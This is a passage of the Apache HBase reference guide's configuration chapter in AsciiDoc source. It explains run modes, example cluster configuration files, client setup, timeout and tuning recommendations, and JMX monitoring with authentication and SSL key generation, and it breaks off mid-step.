required.\nHBase makes use of the `multi` functionality that is only available since Zookeeper 3.4.0. 
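\n\nIf you ever need to set the controlling property explicitly (normally unnecessary, as noted just below), a minimal, illustrative _hbase-site.xml_ snippet would be:\n\n[source,xml]\n----\n<property>\n <name>hbase.zookeeper.useMulti<\/name>\n <value>true<\/value>\n<\/property>\n----\n\n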
The `hbase.zookeeper.useMulti` configuration property defaults to `true`.\nRefer to link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-12241[HBASE-12241 (The crash of regionServer when taking deadserver's replication queue breaks replication)] and link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-6775[HBASE-6775 (Use ZK.multi when available for HBASE-6710 0.92\/0.94 compatibility fix)] for background.\nThe property is deprecated and useMulti is always enabled in HBase 2.0.\n\n[[standalone_dist]]\n== HBase run modes: Standalone and Distributed\n\nHBase has two run modes: <<standalone,standalone>> and <<distributed,distributed>>.\nOut of the box, HBase runs in standalone mode.\nWhatever your mode, you will need to configure HBase by editing files in the HBase _conf_ directory.\nAt a minimum, you must edit [code]+conf\/hbase-env.sh+ to tell HBase which +java+ to use.\nIn this file you set HBase environment variables such as the heapsize and other options for the `JVM`, the preferred location for log files, etc.\nSet [var]+JAVA_HOME+ to point at the root of your +java+ install.\n\n[[standalone]]\n=== Standalone HBase\n\nThis is the default mode.\nStandalone mode is what is described in the <<quickstart,quickstart>> section.\nIn standalone mode, HBase does not use HDFS -- it uses the local filesystem instead -- and it runs all HBase daemons and a local ZooKeeper all up in the same JVM.\nZooKeeper binds to a well known port so clients may talk to HBase.\n\n[[standalone.over.hdfs]]\n==== Standalone HBase over HDFS\nA sometimes useful variation on standalone hbase has all daemons running inside the\none JVM but rather than persist to the local filesystem, instead\nthey persist to an HDFS instance.\n\nYou might consider this profile when you are intent on\na simple deploy profile, the loading is light, but the\ndata must persist across node comings and goings. Writing to\nHDFS where data is replicated ensures the latter.\n\nTo configure this standalone variant, edit your _hbase-site.xml_\nsetting _hbase.rootdir_ to point at a directory in your\nHDFS instance but then set _hbase.cluster.distributed_\nto _false_. For example:\n\n[source,xml]\n----\n<configuration>\n <property>\n <name>hbase.rootdir<\/name>\n <value>hdfs:\/\/namenode.example.org:8020\/hbase<\/value>\n <\/property>\n <property>\n <name>hbase.cluster.distributed<\/name>\n <value>false<\/value>\n <\/property>\n<\/configuration>\n----\n\n[[distributed]]\n=== Distributed\n\nDistributed mode can be subdivided into distributed but all daemons run on a single node -- a.k.a. _pseudo-distributed_ -- and _fully-distributed_ where the daemons are spread across all nodes in the cluster.\nThe _pseudo-distributed_ vs. _fully-distributed_ nomenclature comes from Hadoop.\n\nPseudo-distributed mode can run against the local filesystem or it can run against an instance of the _Hadoop Distributed File System_ (HDFS). 
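\n\nFor illustration only, a pseudo-distributed deployment backed by HDFS might use an _hbase-site.xml_ along these lines (the namenode address is hypothetical; the quickstart chapter has the authoritative walk-through):\n\n[source,xml]\n----\n<configuration>\n <property>\n <name>hbase.rootdir<\/name>\n <value>hdfs:\/\/localhost:8020\/hbase<\/value>\n <\/property>\n <property>\n <name>hbase.cluster.distributed<\/name>\n <value>true<\/value>\n <\/property>\n<\/configuration>\n----\n\n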
Fully-distributed mode can ONLY run on HDFS.\nSee the Hadoop link:https:\/\/hadoop.apache.org\/docs\/current\/[documentation] for how to set up HDFS.\nA good walk-through for setting up HDFS on Hadoop 2 can be found at http:\/\/www.alexjf.net\/blog\/distributed-systems\/hadoop-yarn-installation-definitive-guide.\n\n[[pseudo]]\n==== Pseudo-distributed\n\n.Pseudo-Distributed Quickstart\n[NOTE]\n====\nA quickstart has been added to the <<quickstart,quickstart>> chapter.\nSee <<quickstart_pseudo,quickstart-pseudo>>.\nSome of the information that was originally in this section has been moved there.\n====\n\nA pseudo-distributed mode is simply a fully-distributed mode run on a single host.\nUse this HBase configuration for testing and prototyping purposes only.\nDo not use this configuration for production or for performance evaluation.\n\n[[fully_dist]]\n=== Fully-distributed\n\nBy default, HBase runs in standalone mode.\nBoth standalone mode and pseudo-distributed mode are provided for the purposes of small-scale testing.\nFor a production environment, distributed mode is advised.\nIn distributed mode, multiple instances of HBase daemons run on multiple servers in the cluster.\n\nJust as in pseudo-distributed mode, a fully distributed configuration requires that you set the `hbase.cluster.distributed` property to `true`.\nTypically, the `hbase.rootdir` is configured to point to a highly-available HDFS filesystem.\n\nIn addition, the cluster is configured so that multiple cluster nodes enlist as RegionServers, ZooKeeper QuorumPeers, and backup HMaster servers.\nThese configuration basics are all demonstrated in <<quickstart_fully_distributed,quickstart-fully-distributed>>.\n\n.Distributed RegionServers\nTypically, your cluster will contain multiple RegionServers all running on different servers, as well as primary and backup Master and ZooKeeper daemons.\nThe _conf\/regionservers_ file on the master server contains a list of hosts whose RegionServers are associated with this cluster.\nEach host is on a separate line.\nAll hosts listed in this file will have their RegionServer processes started and stopped when the master server starts or stops.\n\n.ZooKeeper and HBase\nSee the <<zookeeper,ZooKeeper>> section for ZooKeeper setup instructions for HBase.\n\n.Example Distributed HBase Cluster\n====\nThis is a bare-bones _conf\/hbase-site.xml_ for a distributed HBase cluster.\nA cluster that is used for real-world work would contain more custom configuration parameters.\nMost HBase configuration directives have default values, which are used unless the value is overridden in the _hbase-site.xml_.\nSee \"<<config.files,Configuration Files>>\" for more information.\n\n[source,xml]\n----\n\n<configuration>\n <property>\n <name>hbase.rootdir<\/name>\n <value>hdfs:\/\/namenode.example.org:8020\/hbase<\/value>\n <\/property>\n <property>\n <name>hbase.cluster.distributed<\/name>\n <value>true<\/value>\n <\/property>\n <property>\n <name>hbase.zookeeper.quorum<\/name>\n <value>node-a.example.com,node-b.example.com,node-c.example.com<\/value>\n <\/property>\n<\/configuration>\n----\n\nThis is an example _conf\/regionservers_ file, which contains a list of nodes that should run a RegionServer in the cluster.\nThese nodes need HBase installed and they need to use the same contents of the _conf\/_ directory as the Master server\n\n[source]\n----\n\nnode-a.example.com\nnode-b.example.com\nnode-c.example.com\n----\n\nThis is an example _conf\/backup-masters_ file, which contains a list of each node that should 
run a backup Master instance.\nThe backup Master instances will sit idle unless the main Master becomes unavailable.\n\n[source]\n----\n\nnode-b.example.com\nnode-c.example.com\n----\n====\n\n.Distributed HBase Quickstart\nSee <<quickstart_fully_distributed,quickstart-fully-distributed>> for a walk-through of a simple three-node cluster configuration with multiple ZooKeeper, backup HMaster, and RegionServer instances.\n\n.Procedure: HDFS Client Configuration\n. Of note, if you have made HDFS client configuration changes on your Hadoop cluster, such as configuration directives for HDFS clients, as opposed to server-side configurations, you must use one of the following methods to enable HBase to see and use these configuration changes:\n+\na. Add a pointer to your `HADOOP_CONF_DIR` to the `HBASE_CLASSPATH` environment variable in _hbase-env.sh_.\nb. Add a copy of _hdfs-site.xml_ (or _hadoop-site.xml_) or, better, symlinks, under _${HBASE_HOME}\/conf_, or\nc. if only a small set of HDFS client configurations, add them to _hbase-site.xml_.\n\n\nAn example of such an HDFS client configuration is `dfs.replication`.\nIf for example, you want to run with a replication factor of 5, HBase will create files with the default of 3 unless you do the above to make the configuration available to HBase.\n\n[[confirm]]\n== Running and Confirming Your Installation\n\nMake sure HDFS is running first.\nStart and stop the Hadoop HDFS daemons by running _bin\/start-hdfs.sh_ over in the `HADOOP_HOME` directory.\nYou can ensure it started properly by testing the `put` and `get` of files into the Hadoop filesystem.\nHBase does not normally use the MapReduce or YARN daemons. These do not need to be started.\n\n_If_ you are managing your own ZooKeeper, start it and confirm it's running, else HBase will start up ZooKeeper for you as part of its start process.\n\nStart HBase with the following command:\n\n----\nbin\/start-hbase.sh\n----\n\nRun the above from the `HBASE_HOME` directory.\n\nYou should now have a running HBase instance.\nHBase logs can be found in the _logs_ subdirectory.\nCheck them out especially if HBase had trouble starting.\n\nHBase also puts up a UI listing vital attributes.\nBy default it's deployed on the Master host at port 16010 (HBase RegionServers listen on port 16020 by default and put up an informational HTTP server at port 16030). 
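\n\nThese ports can be changed in _hbase-site.xml_; a sketch that simply restates the defaults (per _hbase-default.xml_) looks like:\n\n[source,xml]\n----\n<property>\n <name>hbase.master.info.port<\/name>\n <value>16010<\/value>\n<\/property>\n<property>\n <name>hbase.regionserver.info.port<\/name>\n <value>16030<\/value>\n<\/property>\n----\n\n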
If the Master is running on a host named `master.example.org` on the default port, point your browser at pass:[http:\/\/master.example.org:16010] to see the web interface.\n\nOnce HBase has started, see the <<shell_exercises,shell exercises>> section for how to create tables, add data, scan your insertions, and finally disable and drop your tables.\n\nTo stop HBase after exiting the HBase shell enter\n\n----\n$ .\/bin\/stop-hbase.sh\nstopping hbase...............\n----\n\nShutdown can take a moment to complete.\nIt can take longer if your cluster is comprised of many machines.\nIf you are running a distributed operation, be sure to wait until HBase has shut down completely before stopping the Hadoop daemons.\n\n[[config.files]]\n== Default Configuration\n\n[[hbase.site]]\n=== _hbase-site.xml_ and _hbase-default.xml_\n\nJust as in Hadoop where you add site-specific HDFS configuration to the _hdfs-site.xml_ file, for HBase, site specific customizations go into the file _conf\/hbase-site.xml_.\nFor the list of configurable properties, see <<hbase_default_configurations,hbase default configurations>> below or view the raw _hbase-default.xml_ source file in the HBase source code at _src\/main\/resources_.\n\nNot all configuration options make it out to _hbase-default.xml_.\nSome configurations would only appear in source code; the only way to identify these changes are through code review.\n\nCurrently, changes here will require a cluster restart for HBase to notice the change.\n\/\/ hbase\/src\/main\/asciidoc\n\/\/\ninclude::{docdir}\/..\/..\/..\/target\/asciidoc\/hbase-default.adoc[]\n\n\n[[hbase.env.sh]]\n=== _hbase-env.sh_\n\nSet HBase environment variables in this file.\nExamples include options to pass the JVM on start of an HBase daemon such as heap size and garbage collector configs.\nYou can also set configurations for HBase configuration, log directories, niceness, ssh options, where to locate process pid files, etc.\nOpen the file at _conf\/hbase-env.sh_ and peruse its content.\nEach option is fairly well documented.\nAdd your own environment variables here if you want them read by HBase daemons on startup.\n\nChanges here will require a cluster restart for HBase to notice the change.\n\n[[log4j]]\n=== _log4j.properties_\n\nEdit this file to change rate at which HBase files are rolled and to change the level at which HBase logs messages.\n\nChanges here will require a cluster restart for HBase to notice the change though log levels can be changed for particular daemons via the HBase UI.\n\n[[client_dependencies]]\n=== Client configuration and dependencies connecting to an HBase cluster\n\nIf you are running HBase in standalone mode, you don't need to configure anything for your client to work provided that they are all on the same machine.\n\nSince the HBase Master may move around, clients bootstrap by looking to ZooKeeper for current critical locations.\nZooKeeper is where all these values are kept.\nThus clients require the location of the ZooKeeper ensemble before they can do anything else.\nUsually this ensemble location is kept out in the _hbase-site.xml_ and is picked up by the client from the `CLASSPATH`.\n\nIf you are configuring an IDE to run an HBase client, you should include the _conf\/_ directory on your classpath so _hbase-site.xml_ settings can be found (or add _src\/test\/resources_ to pick up the hbase-site.xml used by tests).\n\nMinimally, an HBase client needs hbase-client module in its dependencies when connecting to a cluster:\n[source,xml]\n----\n<dependency>\n 
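<!-- the version below is illustrative; match it to the HBase version deployed on your cluster -->\n 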
<groupId>org.apache.hbase<\/groupId>\n <artifactId>hbase-client<\/artifactId>\n <version>1.2.4<\/version>\n<\/dependency>\n----\n\nA basic example _hbase-site.xml_ for client only may look as follows:\n[source,xml]\n----\n<?xml version=\"1.0\"?>\n<?xml-stylesheet type=\"text\/xsl\" href=\"configuration.xsl\"?>\n<configuration>\n <property>\n <name>hbase.zookeeper.quorum<\/name>\n <value>example1,example2,example3<\/value>\n <description>The directory shared by region servers.\n <\/description>\n <\/property>\n<\/configuration>\n----\n\n[[java.client.config]]\n==== Java client configuration\n\nThe configuration used by a Java client is kept in an link:https:\/\/hbase.apache.org\/apidocs\/org\/apache\/hadoop\/hbase\/HBaseConfiguration[HBaseConfiguration] instance.\n\nThe factory method on HBaseConfiguration, `HBaseConfiguration.create();`, on invocation, will read in the content of the first _hbase-site.xml_ found on the client's `CLASSPATH`, if one is present (Invocation will also factor in any _hbase-default.xml_ found; an _hbase-default.xml_ ships inside the _hbase.X.X.X.jar_). It is also possible to specify configuration directly without having to read from a _hbase-site.xml_.\nFor example, to set the ZooKeeper ensemble for the cluster programmatically do as follows:\n\n[source,java]\n----\nConfiguration config = HBaseConfiguration.create();\nconfig.set(\"hbase.zookeeper.quorum\", \"localhost\"); \/\/ Here we are running zookeeper locally\n----\n\nIf multiple ZooKeeper instances make up your ZooKeeper ensemble, they may be specified in a comma-separated list (just as in the _hbase-site.xml_ file). This populated `Configuration` instance can then be passed to an link:https:\/\/hbase.apache.org\/apidocs\/org\/apache\/hadoop\/hbase\/client\/Table.html[Table], and so on.\n\n[[config_timeouts]]\n=== Timeout settings\n\nHBase provides many timeout settings to limit the execution time of different remote operations.\n\nThe `hbase.rpc.timeout` property limits how long an RPC call can run before it times out.\nYou can also specify a timeout for read and write operations using `hbase.rpc.read.timeout` and `hbase.rpc.write.timeout` configuration properties. In the absence of these properties `hbase.rpc.timeout` will be used.\nA higher-level timeout is `hbase.client.operation.timeout` which is valid for each client call.\nTimeout for scan operations is controlled differently. 
To set it you can use `hbase.client.scanner.timeout.period` property.\n\n[[example_config]]\n== Example Configurations\n\n=== Basic Distributed HBase Install\n\nHere is a basic configuration example for a distributed ten node cluster:\n* The nodes are named `example0`, `example1`, etc., through node `example9` in this example.\n* The HBase Master and the HDFS NameNode are running on the node `example0`.\n* RegionServers run on nodes `example1`-`example9`.\n* A 3-node ZooKeeper ensemble runs on `example1`, `example2`, and `example3` on the default ports.\n* ZooKeeper data is persisted to the directory _\/export\/zookeeper_.\n\nBelow we show what the main configuration files -- _hbase-site.xml_, _regionservers_, and _hbase-env.sh_ -- found in the HBase _conf_ directory might look like.\n\n[[hbase_site]]\n==== _hbase-site.xml_\n\n[source,xml]\n----\n<?xml version=\"1.0\"?>\n<?xml-stylesheet type=\"text\/xsl\" href=\"configuration.xsl\"?>\n<configuration>\n <property>\n <name>hbase.zookeeper.quorum<\/name>\n <value>example1,example2,example3<\/value>\n <description>The directory shared by RegionServers.\n <\/description>\n <\/property>\n <property>\n <name>hbase.zookeeper.property.dataDir<\/name>\n <value>\/export\/zookeeper<\/value>\n <description>Property from ZooKeeper config zoo.cfg.\n The directory where the snapshot is stored.\n <\/description>\n <\/property>\n <property>\n <name>hbase.rootdir<\/name>\n <value>hdfs:\/\/example0:8020\/hbase<\/value>\n <description>The directory shared by RegionServers.\n <\/description>\n <\/property>\n <property>\n <name>hbase.cluster.distributed<\/name>\n <value>true<\/value>\n <description>The mode the cluster will be in. Possible values are\n false: standalone and pseudo-distributed setups with managed ZooKeeper\n true: fully-distributed with unmanaged ZooKeeper Quorum (see hbase-env.sh)\n <\/description>\n <\/property>\n<\/configuration>\n----\n\n[[regionservers]]\n==== _regionservers_\n\nIn this file you list the nodes that will run RegionServers.\nIn our case, these nodes are `example1`-`example9`.\n\n[source]\n----\nexample1\nexample2\nexample3\nexample4\nexample5\nexample6\nexample7\nexample8\nexample9\n----\n\n[[hbase_env]]\n==== _hbase-env.sh_\n\nThe following lines in the _hbase-env.sh_ file show how to set the `JAVA_HOME` environment variable (required for HBase) and set the heap to 4 GB (rather than the default value of 1 GB). If you copy and paste this example, be sure to adjust the `JAVA_HOME` to suit your environment.\n\n----\n# The java implementation to use.\nexport JAVA_HOME=\/usr\/java\/jdk1.8.0\/\n\n# The maximum amount of heap to use. Default is left to JVM default.\nexport HBASE_HEAPSIZE=4G\n----\n\nUse +rsync+ to copy the content of the _conf_ directory to all nodes of the cluster.\n\n[[important_configurations]]\n== The Important Configurations\n\nBelow we list some _important_ configurations.\nWe've divided this section into required configuration and worth-a-look recommended configs.\n\n[[required_configuration]]\n=== Required Configurations\n\nReview the <<os,os>> and <<hadoop,hadoop>> sections.\n\n[[big.cluster.config]]\n==== Big Cluster Configurations\n\nIf you have a cluster with a lot of regions, it is possible that a Regionserver checks in briefly after the Master starts while all the remaining RegionServers lag behind. 
This first server to check in will be assigned all regions which is not optimal.\nTo prevent the above scenario from happening, up the `hbase.master.wait.on.regionservers.mintostart` property from its default value of 1.\nSee link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-6389[HBASE-6389 Modify the\n conditions to ensure that Master waits for sufficient number of Region Servers before\n starting region assignments] for more detail.\n\n[[recommended_configurations]]\n=== Recommended Configurations\n\n[[recommended_configurations.zk]]\n==== ZooKeeper Configuration\n\n[[sect.zookeeper.session.timeout]]\n===== `zookeeper.session.timeout`\n\nThe default timeout is three minutes (specified in milliseconds). This means that if a server crashes, it will be three minutes before the Master notices the crash and starts recovery.\nYou might need to tune the timeout down to a minute or even less so the Master notices failures sooner.\nBefore changing this value, be sure you have your JVM garbage collection configuration under control, otherwise, a long garbage collection that lasts beyond the ZooKeeper session timeout will take out your RegionServer. (You might be fine with this -- you probably want recovery to start on the server if a RegionServer has been in GC for a long period of time).\n\nTo change this configuration, edit _hbase-site.xml_, copy the changed file across the cluster and restart.\n\nWe set this value high to save our having to field questions up on the mailing lists asking why a RegionServer went down during a massive import.\nThe usual cause is that their JVM is untuned and they are running into long GC pauses.\nOur thinking is that while users are getting familiar with HBase, we'd save them having to know all of its intricacies.\nLater when they've built some confidence, then they can play with configuration such as this.\n\n[[zookeeper.instances]]\n===== Number of ZooKeeper Instances\n\nSee <<zookeeper,zookeeper>>.\n\n[[recommended.configurations.hdfs]]\n==== HDFS Configurations\n\n[[dfs.datanode.failed.volumes.tolerated]]\n===== `dfs.datanode.failed.volumes.tolerated`\n\nThis is the \"...number of volumes that are allowed to fail before a DataNode stops offering service.\nBy default any volume failure will cause a datanode to shutdown\" from the _hdfs-default.xml_ description.\nYou might want to set this to about half the amount of your available disks.\n\n[[hbase.regionserver.handler.count]]\n===== `hbase.regionserver.handler.count`\n\nThis setting defines the number of threads that are kept open to answer incoming requests to user tables.\nThe rule of thumb is to keep this number low when the payload per request approaches the MB (big puts, scans using a large cache) and high when the payload is small (gets, small puts, ICVs, deletes). 
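\n\nAs a purely hypothetical tuning sketch for a workload dominated by small gets and puts, one might raise the handler count in _hbase-site.xml_ (check _hbase-default.xml_ for the default in your release):\n\n[source,xml]\n----\n<property>\n <name>hbase.regionserver.handler.count<\/name>\n <value>60<\/value>\n<\/property>\n----\n\n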
The total size of the queries in progress is limited by the setting `hbase.ipc.server.max.callqueue.size`.\n\nIt is safe to set that number to the maximum number of incoming clients if their payload is small, the typical example being a cluster that serves a website since puts aren't typically buffered and most of the operations are gets.\n\nThe reason why it is dangerous to keep this setting high is that the aggregate size of all the puts that are currently happening in a region server may impose too much pressure on its memory, or even trigger an OutOfMemoryError.\nA RegionServer running on low memory will trigger its JVM's garbage collector to run more frequently up to a point where GC pauses become noticeable (the reason being that all the memory used to keep all the requests' payloads cannot be trashed, no matter how hard the garbage collector tries). After some time, the overall cluster throughput is affected since every request that hits that RegionServer will take longer, which exacerbates the problem even more.\n\nYou can get a sense of whether you have too little or too many handlers by <<rpc.logging,rpc.logging>> on an individual RegionServer then tailing its logs (Queued requests consume memory).\n\n[[big_memory]]\n==== Configuration for large memory machines\n\nHBase ships with a reasonable, conservative configuration that will work on nearly all machine types that people might want to test with.\nIf you have larger machines -- HBase has 8G and larger heap -- you might find the following configuration options helpful.\nTODO.\n\n[[config.compression]]\n==== Compression\n\nYou should consider enabling ColumnFamily compression.\nThere are several options that are near-frictionless and in most all cases boost performance by reducing the size of StoreFiles and thus reducing I\/O.\n\nSee <<compression,compression>> for more information.\n\n[[config.wals]]\n==== Configuring the size and number of WAL files\n\nHBase uses <<wal,wal>> to recover the memstore data that has not been flushed to disk in case of an RS failure.\nThese WAL files should be configured to be slightly smaller than HDFS block (by default a HDFS block is 64Mb and a WAL file is ~60Mb).\n\nHBase also has a limit on the number of WAL files, designed to ensure there's never too much data that needs to be replayed during recovery.\nThis limit needs to be set according to memstore configuration, so that all the necessary data would fit.\nIt is recommended to allocate enough WAL files to store at least that much data (when all memstores are close to full). 
For example, with 16Gb RS heap, default memstore settings (0.4), and default WAL file size (~60Mb), 16Gb*0.4\/60, the starting point for WAL file count is ~109.\nHowever, as all memstores are not expected to be full all the time, less WAL files can be allocated.\n\n[[disable.splitting]]\n==== Managed Splitting\n\nHBase generally handles splitting of your regions based upon the settings in your _hbase-default.xml_ and _hbase-site.xml_ configuration files.\nImportant settings include `hbase.regionserver.region.split.policy`, `hbase.hregion.max.filesize`, `hbase.regionserver.regionSplitLimit`.\nA simplistic view of splitting is that when a region grows to `hbase.hregion.max.filesize`, it is split.\nFor most usage patterns, you should use automatic splitting.\nSee <<manual_region_splitting_decisions,manual region splitting decisions>> for more information about manual region splitting.\n\nInstead of allowing HBase to split your regions automatically, you can choose to manage the splitting yourself.\nThis feature was added in HBase 0.90.0.\nManually managing splits works if you know your keyspace well, otherwise let HBase figure where to split for you.\nManual splitting can mitigate region creation and movement under load.\nIt also makes it so region boundaries are known and invariant (if you disable region splitting). If you use manual splits, it is easier doing staggered, time-based major compactions to spread out your network IO load.\n\n.Disable Automatic Splitting\nTo disable automatic splitting, you can set region split policy in either cluster configuration or table configuration to be `org.apache.hadoop.hbase.regionserver.DisabledRegionSplitPolicy`\n\n.Automatic Splitting Is Recommended\n[NOTE]\n====\nIf you disable automatic splits to diagnose a problem or during a period of fast data growth, it is recommended to re-enable them when your situation becomes more stable.\nThe potential benefits of managing region splits yourself are not undisputed.\n====\n\n.Determine the Optimal Number of Pre-Split Regions\nThe optimal number of pre-split regions depends on your application and environment.\nA good rule of thumb is to start with 10 pre-split regions per server and watch as data grows over time.\nIt is better to err on the side of too few regions and perform rolling splits later.\nThe optimal number of regions depends upon the largest StoreFile in your region.\nThe size of the largest StoreFile will increase with time if the amount of data grows.\nThe goal is for the largest region to be just large enough that the compaction selection algorithm only compacts it during a timed major compaction.\nOtherwise, the cluster can be prone to compaction storms with a large number of regions under compaction at the same time.\nIt is important to understand that the data growth causes compaction storms and not the manual split decision.\n\nIf the regions are split into too many large regions, you can increase the major compaction interval by configuring `HConstants.MAJOR_COMPACTION_PERIOD`.\nHBase 0.90 introduced `org.apache.hadoop.hbase.util.RegionSplitter`, which provides a network-IO-safe rolling split of all regions.\n\n[[managed.compactions]]\n==== Managed Compactions\n\nBy default, major compactions are scheduled to run once in a 7-day period.\nPrior to HBase 0.96.x, major compactions were scheduled to happen once per day by default.\n\nIf you need to control exactly when and how often major compaction runs, you can disable managed major compactions.\nSee the entry for 
`hbase.hregion.majorcompaction` in the <<compaction.parameters,compaction.parameters>> table for details.\n\n.Do Not Disable Major Compactions\n[WARNING]\n====\nMajor compactions are absolutely necessary for StoreFile clean-up.\nDo not disable them altogether.\nYou can run major compactions manually via the HBase shell or via the link:https:\/\/hbase.apache.org\/apidocs\/org\/apache\/hadoop\/hbase\/client\/Admin.html#majorCompact-org.apache.hadoop.hbase.TableName-[Admin API].\n====\n\nFor more information about compactions and the compaction file selection process, see <<compaction,compaction>>\n\n[[spec.ex]]\n==== Speculative Execution\n\nSpeculative Execution of MapReduce tasks is on by default, and for HBase clusters it is generally advised to turn off Speculative Execution at a system-level unless you need it for a specific case, where it can be configured per-job.\nSet the properties `mapreduce.map.speculative` and `mapreduce.reduce.speculative` to false.\n\n[[other_configuration]]\n=== Other Configurations\n\n[[balancer_config]]\n==== Balancer\n\nThe balancer is a periodic operation which is run on the master to redistribute regions on the cluster.\nIt is configured via `hbase.balancer.period` and defaults to 300000 (5 minutes).\n\nSee <<master.processes.loadbalancer,master.processes.loadbalancer>> for more information on the LoadBalancer.\n\n[[disabling.blockcache]]\n==== Disabling Blockcache\n\nDo not turn off block cache (You'd do it by setting `hfile.block.cache.size` to zero). Currently we do not do well if you do this because the RegionServer will spend all its time loading HFile indices over and over again.\nIf your working set is such that block cache does you no good, at least size the block cache such that HFile indices will stay up in the cache (you can get a rough idea on the size you need by surveying RegionServer UIs; you'll see index block size accounted near the top of the webpage).\n\n[[nagles]]\n==== link:http:\/\/en.wikipedia.org\/wiki\/Nagle's_algorithm[Nagle's] or the small package problem\n\nIf a big 40ms or so occasional delay is seen in operations against HBase, try the Nagles' setting.\nFor example, see the user mailing list thread, link:http:\/\/search-hadoop.com\/m\/pduLg2fydtE\/Inconsistent+scan+performance+with+caching+set+&subj=Re+Inconsistent+scan+performance+with+caching+set+to+1[Inconsistent scan performance with caching set to 1] and the issue cited therein where setting `notcpdelay` improved scan speeds.\nYou might also see the graphs on the tail of link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-7008[HBASE-7008 Set scanner caching to a better default] where our Lars Hofhansl tries various data sizes w\/ Nagle's on and off measuring the effect.\n\n[[mttr]]\n==== Better Mean Time to Recover (MTTR)\n\nThis section is about configurations that will make servers come back faster after a fail.\nSee the Deveraj Das and Nicolas Liochon blog post link:http:\/\/hortonworks.com\/blog\/introduction-to-hbase-mean-time-to-recover-mttr\/[Introduction to HBase Mean Time to Recover (MTTR)] for a brief introduction.\n\nThe issue link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-8389[HBASE-8354 forces Namenode into loop with lease recovery requests] is messy but has a bunch of good discussion toward the end on low timeouts and how to cause faster recovery including citation of fixes added to HDFS. 
Read the Varun Sharma comments.\nThe below suggested configurations are Varun's suggestions distilled and tested.\nMake sure you are running on a late-version HDFS so you have the fixes he refers to and himself adds to HDFS that help HBase MTTR (e.g.\nHDFS-3703, HDFS-3712, and HDFS-4791 -- Hadoop 2 for sure has them and late Hadoop 1 has some). Set the following in the RegionServer.\n\n[source,xml]\n----\n<property>\n <name>hbase.lease.recovery.dfs.timeout<\/name>\n <value>23000<\/value>\n <description>How much time we allow elapse between calls to recover lease.\n Should be larger than the dfs timeout.<\/description>\n<\/property>\n<property>\n <name>dfs.client.socket-timeout<\/name>\n <value>10000<\/value>\n <description>Down the DFS timeout from 60 to 10 seconds.<\/description>\n<\/property>\n----\n\nAnd on the NameNode\/DataNode side, set the following to enable 'staleness' introduced in HDFS-3703, HDFS-3912.\n\n[source,xml]\n----\n<property>\n <name>dfs.client.socket-timeout<\/name>\n <value>10000<\/value>\n <description>Down the DFS timeout from 60 to 10 seconds.<\/description>\n<\/property>\n<property>\n <name>dfs.datanode.socket.write.timeout<\/name>\n <value>10000<\/value>\n <description>Down the DFS timeout from 8 * 60 to 10 seconds.<\/description>\n<\/property>\n<property>\n <name>ipc.client.connect.timeout<\/name>\n <value>3000<\/value>\n <description>Down from 60 seconds to 3.<\/description>\n<\/property>\n<property>\n <name>ipc.client.connect.max.retries.on.timeouts<\/name>\n <value>2<\/value>\n <description>Down from 45 seconds to 3 (2 == 3 retries).<\/description>\n<\/property>\n<property>\n <name>dfs.namenode.avoid.read.stale.datanode<\/name>\n <value>true<\/value>\n <description>Enable stale state in hdfs<\/description>\n<\/property>\n<property>\n <name>dfs.namenode.stale.datanode.interval<\/name>\n <value>20000<\/value>\n <description>Down from default 30 seconds<\/description>\n<\/property>\n<property>\n <name>dfs.namenode.avoid.write.stale.datanode<\/name>\n <value>true<\/value>\n <description>Enable stale state in hdfs<\/description>\n<\/property>\n----\n\n[[jmx_config]]\n==== JMX\n\nJMX (Java Management Extensions) provides built-in instrumentation that enables you to monitor and manage the Java VM.\nTo enable monitoring and management from remote systems, you need to set system property `com.sun.management.jmxremote.port` (the port number through which you want to enable JMX RMI connections) when you start the Java VM.\nSee the link:http:\/\/docs.oracle.com\/javase\/8\/docs\/technotes\/guides\/management\/agent.html[official documentation] for more information.\nHistorically, besides above port mentioned, JMX opens two additional random TCP listening ports, which could lead to port conflict problem. 
(See link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-10289[HBASE-10289] for details)\n\nAs an alternative, You can use the coprocessor-based JMX implementation provided by HBase.\nTo enable it in 0.99 or above, add below property in _hbase-site.xml_:\n\n[source,xml]\n----\n<property>\n <name>hbase.coprocessor.regionserver.classes<\/name>\n <value>org.apache.hadoop.hbase.JMXListener<\/value>\n<\/property>\n----\n\nNOTE: DO NOT set `com.sun.management.jmxremote.port` for Java VM at the same time.\n\nCurrently it supports Master and RegionServer Java VM.\nBy default, the JMX listens on TCP port 10102, you can further configure the port using below properties:\n\n[source,xml]\n----\n<property>\n <name>regionserver.rmi.registry.port<\/name>\n <value>61130<\/value>\n<\/property>\n<property>\n <name>regionserver.rmi.connector.port<\/name>\n <value>61140<\/value>\n<\/property>\n----\n\nThe registry port can be shared with connector port in most cases, so you only need to configure regionserver.rmi.registry.port.\nHowever if you want to use SSL communication, the 2 ports must be configured to different values.\n\nBy default the password authentication and SSL communication is disabled.\nTo enable password authentication, you need to update _hbase-env.sh_ like below:\n[source,bash]\n----\nexport HBASE_JMX_BASE=\"-Dcom.sun.management.jmxremote.authenticate=true \\\n -Dcom.sun.management.jmxremote.password.file=your_password_file \\\n -Dcom.sun.management.jmxremote.access.file=your_access_file\"\n\nexport HBASE_MASTER_OPTS=\"$HBASE_MASTER_OPTS $HBASE_JMX_BASE \"\nexport HBASE_REGIONSERVER_OPTS=\"$HBASE_REGIONSERVER_OPTS $HBASE_JMX_BASE \"\n----\n\nSee example password\/access file under _$JRE_HOME\/lib\/management_.\n\nTo enable SSL communication with password authentication, follow below steps:\n\n[source,bash]\n----\n#1. generate a key pair, stored in myKeyStore\nkeytool -genkey -alias jconsole -keystore myKeyStore\n\n#2. export it to file jconsole.cert\nkeytool -export -alias jconsole -keystore myKeyStore -file jconsole.cert\n\n#3. 
